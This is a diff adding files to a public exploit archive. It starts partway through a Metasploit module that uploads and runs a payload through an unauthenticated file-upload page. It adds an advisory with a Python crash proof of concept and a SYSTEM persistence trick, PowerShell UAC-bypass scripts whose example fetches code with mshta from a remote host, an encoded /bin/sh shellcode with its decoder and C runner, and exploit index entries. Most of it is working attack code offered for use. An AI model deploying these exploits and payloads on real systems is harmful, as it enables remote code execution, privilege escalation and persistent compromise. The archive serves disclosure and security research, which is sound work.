+    @shell = "#{fname}"
+    pdata = Rex::MIME::Message.new
+    pdata.add_part("" + payload.encoded, 'application/octet-stream', nil, "form-data; name=\"txtdocname\"; filename=\"#{fname}\"")
+    pdata.add_part('Submit', nil, nil, 'form-data; name="btnsubmit"')
+    data = pdata.to_s
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'data'  => data,
+      'agent' => 'Mozilla',
+      'ctype' => "multipart/form-data; boundary=#{pdata.bound}",
+      'uri' => normalize_uri(target_uri.path, "greatbritain", "greatbritain", "upload_fille.php")
+    })
+
+    if res && res.code == 200 && res.body =~ /Successfully/
+      print_status("Trying to upload #{fname}")
+      return true
+    else
+      fail_with(Failure::NoAccess, 'Error occurred during uploading!')
+      return false
+    end
+  end
+
+  def exploit
+    unless Exploit::CheckCode::Vulnerable == check
+      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
+    end
+
+    if upload_shell(true)
+      print_good("Upload successfully.")
+      exec(@shell)
+    end
+  end
+
+  def check
+
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path, "greatbritain", "greatbritain", "upload_fille.php")
+    })
+
+    unless res
+      vprint_error 'Connection failed'
+      return CheckCode::Unknown
+    end
+
+    if res && res.code == 200 && res.body =~ /upload_fille.php/
+      return Exploit::CheckCode::Vulnerable
+    end
+    return Exploit::CheckCode::Safe
+  end
+end

exploits/windows/dos/46995.txt

@@ -0,0 +1,134 @@
+[+] Credits: John Page (aka hyp3rlinx)		
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/HC10-HC.SERVER-10.14-REMOTE-INVALID-POINTER-WRITE.txt
+[+] ISR: ApparitionSec          
+ 
+
+
+[Vendor]
+www.hostingcontroller.com
+
+
+[Product]
+HC10 HC.Server Service 10.14
+
+HC10 is a unified hosting automation control panel for web hosts and Cloud based service providers to manage both Windows & Linux servers
+simultaneously as part of a single cluster. HC works on an N-tier user model.
+
+
+[Vulnerability Type]
+Remote Invalid Pointer Write
+
+
+[CVE Reference]
+CVE-2019-12323
+
+
+[Security Issue]
+The HC.Server service in Hosting Controller HC10 10.14 allows an Invalid Pointer Write DoS if attackers can reach the service on port 8794.
+In addition this can potentially be leveraged for post exploit persistence with SYSTEM privileges, if physical access or malware is involved.
+
+If a physical attacker or malware can set its own program for the service failure recovery options, it can be used to maintain persistence.
+Afterwards, it can be triggered by sending a malicious request to DoS the service, which in turn can start the attackers recovery program.
+The attackers program can then try restarting the affected service to try an stay unnoticed by calling "sc start HCServerService".
+
+Services failure flag recovery options for "enabling actions for stops or errors" and can be set in the services "Recovery" properties tab
+or on the command line. Authentication is not required to reach the vulnerable service, this was tested successfully on Windows 7/10.
+
+
+SERVICE_NAME: HCServerService
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 0   IGNORE
+        BINARY_PATH_NAME   : "C:\Program Files\Hosting Controller\Provisioning\HC.Server.exe"
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : HC Server Service
+        DEPENDENCIES       : HCProvisioningService
+        SERVICE_START_NAME : LocalSystem
+
+
+Crash Dump:
+
+INVALID_POINTER_WRITE_EXPLOITABLE
+
+CONTEXT: (.ecxr)
+rax=0000000000000bfd rbx=0000000000df94f0 rcx=03743db166a90000
+rdx=0000000080000000 rsi=00000000000000b4 rdi=0000000000000000
+rip=0000000140025b6c rsp=000000000118f570 rbp=0000000000000000
+r8=000000000000001f r9=00000000000006fe r10=0000000000000603
+r11=0000000000df0158 r12=0000000000000000 r13=0000000000000000
+r14=0000000000000000 r15=0000000000000000
+iopl=0 nv up ei pl nz na pe nc
+cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
+HC_Server+0x25b6c:
+00000001`40025b6c c68404d001000000 mov byte ptr [rsp+rax+1D0h],0 ss:00000000`0119033d=??
+Resetting default scope
+
+FAULTING_IP: 
+HC_Server+25b6c
+00000001`40025b6c c68404d001000000 mov byte ptr [rsp+rax+1D0h],0
+
+EXCEPTION_RECORD: (.exr -1)
+ExceptionAddress: 0000000140025b6c (HC_Server+0x0000000000025b6c)
+ExceptionCode: c0000005 (Access violation)
+ExceptionFlags: 00000000
+NumberParameters: 2
+Parameter[0]: 0000000000000001
+Parameter[1]: 000000000119033d
+Attempt to write to address 000000000119033d
+
+PROCESS_NAME: HC.Server.exe
+
+
+
+[Exploit/POC]
+1) Configure the HCServiceService recovery failure options to an arbitrary program.
+2) Trigger the remote invalid pointer write to gain persistence with SYSTEM privileges.
+
+from socket import *
+
+IP = raw_input("[+] HC Server Service IP ")
+PORT = 8794
+
+payload = "A"*4000
+s=socket(AF_INET,SOCK_STREAM)
+s.connect((IP, PORT))
+s.send(payload)
+s.close()
+
+print "Triggering HC10 Server Service Xploit"
+print "hyp3rlinx"
+
+
+
+[Network Access]
+Remote
+
+
+
+[Severity]
+Medium
+
+
+
+[Disclosure Timeline]
+Vendor Notification: May 14, 2019
+No reply
+Second notification: May 21, 2019
+Vendor "will change the implementation soon in any of forthcoming installer." : May 22, 2019 
+mitre assign CVE: May 27, 2019
+Vendor : "New installer to be released June 13, 2019"
+June 16, 2019 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx

exploits/windows/local/46998.txt

@@ -0,0 +1,83 @@
+Interactive Version:
+
+<#
+.SYNOPSIS
+	This script is a proof of concept to bypass the User Access Control (UAC) via SluiFileHandlerHijackLPE
+.NOTES
+	Function   : SluiHijackBypass
+	File Name  : SluiHijackBypass.ps1
+	Author     : Gushmazuko
+.LINK
+	https://github.com/gushmazuko/WinBypass/blob/master/SluiHijackBypass.ps1
+	Original source: https://bytecode77.com/hacking/exploits/uac-bypass/slui-file-handler-hijack-privilege-escalation
+.EXAMPLE
+	Load "cmd.exe" (By Default used 'arch 64'):
+	SluiHijackBypass -command "cmd.exe" -arch 64
+
+	Load "mshta http://192.168.0.30:4444/0HUGN"
+	SluiHijackBypass -command "mshta http://192.168.0.30:4444/0HUGN"
+#>
+
+function SluiHijackBypass(){
+	Param (
+
+		[Parameter(Mandatory=$True)]
+		[String]$command,
+		[ValidateSet(64,86)]
+		[int]$arch = 64
+	)
+
+	#Create registry structure
+	New-Item "HKCU:\Software\Classes\exefile\shell\open\command" -Force
+	Set-ItemProperty -Path "HKCU:\Software\Classes\exefile\shell\open\command" -Name "(default)" -Value $command -Force
+
+	#Perform the bypass
+	switch($arch)
+	{
+		64
+		{
+			#x64 shell in Windows x64 | x86 shell in Windows x86
+			Start-Process "C:\Windows\System32\slui.exe" -Verb runas
+		}
+		86
+		{
+			#x86 shell in Windows x64
+			C:\Windows\Sysnative\cmd.exe /c "powershell Start-Process C:\Windows\System32\slui.exe -Verb runas"
+		}
+	}
+
+	#Remove registry structure
+	Start-Sleep 3
+	Remove-Item "HKCU:\Software\Classes\exefile\shell\" -Recurse -Force
+}
+
+
+################################################################################
+
+
+Non-Interactive Version:
+
+<#
+.SYNOPSIS
+  Noninteractive version of script, for directly execute.
+  This script is a proof of concept to bypass the User Access Control (UAC) via SluiFileHandlerHijackLPE
+.NOTES
+	File Name  : SluiHijackBypass_direct.ps1
+	Author     : Gushmazuko
+.LINK
+	https://github.com/gushmazuko/WinBypass/blob/master/SluiHijackBypass_direct.ps1
+	Original source: https://bytecode77.com/hacking/exploits/uac-bypass/slui-file-handler-hijack-privilege-escalation
+.EXAMPLE
+	Load "cmd.exe" (By Default used 'arch 64'):
+	powershell -exec bypass .\SluiHijackBypass_direct.ps1
+#>
+
+$program = "cmd.exe"
+New-Item "HKCU:\Software\Classes\exefile\shell\open\command" -Force
+Set-ItemProperty -Path "HKCU:\Software\Classes\exefile\shell\open\command" -Name "(default)" -Value $program -Force
+#For x64 shell in Windows x64:
+Start-Process "C:\Windows\System32\slui.exe" -Verb runas
+#For x86 shell in Windows x64:
+#C:\Windows\Sysnative\cmd.exe /c "powershell Start-Process "C:\Windows\System32\slui.exe" -Verb runas"
+Start-Sleep 3
+Remove-Item "HKCU:\Software\Classes\exefile\shell\" -Recurse -Force

files_exploits.csv

@@ -6474,6 +6474,12 @@ id,file,description,date,author,type,platform,port
 46941,exploits/android/dos/46941.txt,"Qualcomm Android - Kernel Use-After-Free via Incorrect set_page_dirty() in KGSL",2019-05-29,"Google Security Research",dos,android,
 46946,exploits/windows/dos/46946.py,"Microsoft Windows Remote Desktop - 'BlueKeep' Denial of Service",2019-05-30,n1xbyte,dos,windows,
 46968,exploits/multiple/dos/46968.html,"Google Chrome 73.0.3683.103 - 'WasmMemoryObject::Grow' Use-After-Free",2019-06-05,"Google Security Research",dos,multiple,
+46995,exploits/windows/dos/46995.txt,"HC10 HC.Server Service 10.14 - Remote Invalid Pointer Write",2019-06-17,hyp3rlinx,dos,windows,
+46997,exploits/linux/dos/46997.py,"Netperf 2.6.0 - Stack-Based Buffer Overflow",2019-06-17,"Juan Sacco",dos,linux,
+47001,exploits/multiple/dos/47001.txt,"Thunderbird ESR < 60.7.XXX - Type Confusion",2019-06-17,"X41 D-Sec GmbH",dos,multiple,
+47002,exploits/multiple/dos/47002.txt,"Thunderbird ESR < 60.7.XXX - 'icalmemorystrdupanddequote' Heap-Based Buffer Overflow",2019-06-17,"X41 D-Sec GmbH",dos,multiple,
+47003,exploits/multiple/dos/47003.txt,"Thunderbird ESR < 60.7.XXX - 'parser_get_next_char' Heap-Based Buffer Overflow",2019-06-17,"X41 D-Sec GmbH",dos,multiple,
+47004,exploits/multiple/dos/47004.txt,"Thunderbird ESR < 60.7.XXX - 'icalrecur_add_bydayrules' Stack-Based Buffer Overflow",2019-06-17,"X41 D-Sec GmbH",dos,multiple,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10547,6 +10553,8 @@ id,file,description,date,author,type,platform,port
 46988,exploits/windows/local/46988.txt,"Pronestor Health Monitoring < 8.1.11.0  - Privilege Escalation",2019-06-13,PovlTekstTV,local,windows,
 46989,exploits/linux/local/46989.sh,"CentOS 7.6 - 'ptrace_scope' Privilege Escalation",2019-06-14,s4vitar,local,linux,
 46991,exploits/windows/local/46991.py,"Aida64 6.00.5100 - 'Log to CSV File' Local SEH Buffer Overflow",2019-06-14,"Nipun Jaswal",local,windows,
+46996,exploits/linux/local/46996.sh,"Exim 4.87 - 4.91 - Local Privilege Escalation",2019-06-17,"Marco Ivaldi",local,linux,
+46998,exploits/windows/local/46998.txt,"Microsoft Windows - UAC Protection Bypass (Via Slui File Handler Hijack) (PowerShell)",2019-06-17,Gushmazuko,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -17493,6 +17501,7 @@ id,file,description,date,author,type,platform,port
 46970,exploits/linux/remote/46970.rb,"LibreNMS - addhost Command Injection (Metasploit)",2019-06-05,Metasploit,remote,linux,
 46974,exploits/linux/remote/46974.txt,"Exim 4.87 < 4.91 - (Local / Remote) Command Execution",2019-06-05,"Qualys Corporation",remote,linux,
 46984,exploits/linux/remote/46984.rb,"Webmin 1.910 - 'Package Updates' Remote Command Execution (Metasploit)",2019-06-11,AkkuS,remote,linux,
+46999,exploits/php/remote/46999.rb,"AROX School-ERP Pro - Unauthenticated Remote Command Execution (Metasploit)",2019-06-17,AkkuS,remote,php,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -41396,3 +41405,6 @@ id,file,description,date,author,type,platform,port
 46983,exploits/jsp/webapps/46983.txt,"Liferay Portal 7.1 CE GA=3 / SimpleCaptcha API - Cross-Site Scripting",2019-06-11,"Valerio Brussani",webapps,jsp,
 46985,exploits/php/webapps/46985.py,"FusionPBX 4.4.3 - Remote Command Execution",2019-06-12,"Dustin Cobb",webapps,php,
 46987,exploits/aspx/webapps/46987.txt,"Sitecore 8.x - Deserialization Remote Code Execution",2019-06-13,"Jarad Kopf",webapps,aspx,
+46992,exploits/multiple/webapps/46992.py,"RedwoodHQ 2.5.5 - Authentication Bypass",2019-06-17,EthicalHCOP,webapps,multiple,
+46993,exploits/hardware/webapps/46993.txt,"CleverDog Smart Camera DOG-2W / DOG-2W-V4 - Multiple Vulnerabilities",2019-06-17,"Alex Akinbi",webapps,hardware,
+47000,exploits/java/webapps/47000.txt,"Spring Security OAuth - Open Redirector",2019-06-17,Riemann,webapps,java,

files_shellcodes.csv

@@ -969,3 +969,4 @@ id,file,description,date,author,type,platform
 46907,shellcodes/linux_x86-64/46907.c,"Linux/x64 - Execve(/bin/sh) Shellcode (23 bytes)",2019-05-23,Rajvardhan,shellcode,linux_x86-64
 46975,shellcodes/linux_x86-64/46975.c,"Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (131 bytes)",2019-06-07,"Aron Mihaljevic",shellcode,linux_x86-64
 46979,shellcodes/linux_x86-64/46979.c,"Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (104 bytes)",2019-06-10,"Aron Mihaljevic",shellcode,linux_x86-64
+46994,shellcodes/linux_x86/46994.txt,"Linux/x86 - Reposition + INC encoder with execve(/bin/sh) Shellcode (66 bytes)",2019-06-17,"Jonathan So",shellcode,linux_x86

shellcodes/linux_x86/46994.txt

@@ -0,0 +1,106 @@
+# Title: Linux/x86 - Reposition + INC encoder with execve(/bin/sh) Shellcode (66 bytes)
+# Author: Jonathan So
+# Date: 15/06/2019
+# Purpose: decode and spawn a /bin/sh shell
+# Tested On: Linux kali 4.19.0-kali4-686 #1 SMP Debian 4.19.28-2kali1 (2019-03-18) i686 GNU/Linux
+# Arch: x86
+# Size: 66 bytes
+# Write-up Link: https://xmilkpowderx.github.io/2019-06-15-SLAEEX4/
+
+======================================================Python Encoder======================================================
+
+#!/usr/bin/python
+#execve(/bin/sh)
+shellcode = ("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")
+
+encoded = ""
+encodedP2 = ""
+encoded2 = ""
+encoded2P2 = ""
+count = 1
+
+print 'Encoded shellcode ...'
+
+#Rearrange the position of shellcode and increase each of them by 1
+for x in bytearray(shellcode) :
+	x += 1
+	if count % 2 != 0:
+		encoded += '\\x'
+		encoded += '%02x' % x
+	else:
+		encodedP2 += '\\x'
+		encodedP2 += '%02x' % x
+	if count % 2 != 0:
+		encoded2 += '0x'
+		encoded2 += '%02x,' % x
+	else:
+		encoded2P2 += '0x'
+		encoded2P2 += '%02x,' % x
+	count += 1
+
+print encoded + encodedP2
+print encoded2 + encoded2P2
+
+print 'Len: %d' % len(bytearray(shellcode))
+print 'Replace number to: %d' % (count/2)
+
+======================================================Encoded Shellcode======================================================
+
+Original:   \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80
+Encoded:    \x32\x51\x30\x74\x69\x63\x6f\xe4\x8a\x54\xe2\x0c\x81\xc1\x69\x30\x69\x30\x6a\x8a\x51\xe3\x8a\xb1\xce
+
+========================================================Decoder.nasm=========================================================
+
+global _start			
+
+section .text
+_start:
+
+	jmp short call_shellcode
+decoder:
+	pop esi
+	lea edi, [esi + 13]		;half of encoded shellcode len = 25/2 = 13
+	xor ebx, ebx
+	xor ecx, ecx
+	mul ecx
+	mov edx, esp
+	mov cl, 13
+decode:                     		;Rearrange the value of shellcode
+	mov bl, byte[esi]		;get value from esi
+	dec ebx				;decrease by 1
+	mov byte[edx + eax], bl
+	inc eax
+	mov bl, byte[edi]		;get value from edi
+	dec ebx				;decrease by 1
+	mov byte[edx + eax], bl
+	inc eax
+	inc esi
+	inc edi
+	loop decode
+
+	jmp edx
+
+call_shellcode:
+
+	call decoder
+	EncodedShellcode: db 0x32,0x51,0x30,0x74,0x69,0x63,0x6f,0xe4,0x8a,0x54,0xe2,0x0c,0x81,0xc1,0x69,0x30,0x69,0x30,0x6a,0x8a,0x51,0xe3,0x8a,0xb1,0xce
+
+======================================================objdump Generated Shellcode======================================================
+
+\xeb\x22\x5e\x8d\x7e\x0d\x31\xdb\x31\xc9\xf7\xe1\x89\xe2\xb1\x0d\x8a\x1e\x4b\x88\x1c\x02\x40\x8a\x1f\x4b\x88\x1c
+\x02\x40\x46\x47\xe2\xee\xff\xe2\xe8\xd9\xff\xff\xff\x32\x51\x30\x74\x69\x63\x6f\xe4\x8a\x54\xe2\x0c\x81\xc1\x69
+\x30\x69\x30\x6a\x8a\x51\xe3\x8a\xb1\xce
+
+============================================================Proof of Concept============================================================
+
+#include<stdio.h>
+#include<string.h>
+
+unsigned char code[] = \
+"\xeb\x22\x5e\x8d\x7e\x0d\x31\xdb\x31\xc9\xf7\xe1\x89\xe2\xb1\x0d\x8a\x1e\x4b\x88\x1c\x02\x40\x8a\x1f\x4b\x88\x1c\x02\x40\x46\x47\xe2\xee\xff\xe2\xe8\xd9\xff\xff\xff\x32\x51\x30\x74\x69\x63\x6f\xe4\x8a\x54\xe2\x0c\x81\xc1\x69\x30\x69\x30\x6a\x8a\x51\xe3\x8a\xb1\xce";
+
+int main(){
+	printf("Shellcode Length:  %d\n", strlen(code));
+	int (*ret)() = (int(*)())code;
+	ret();
+}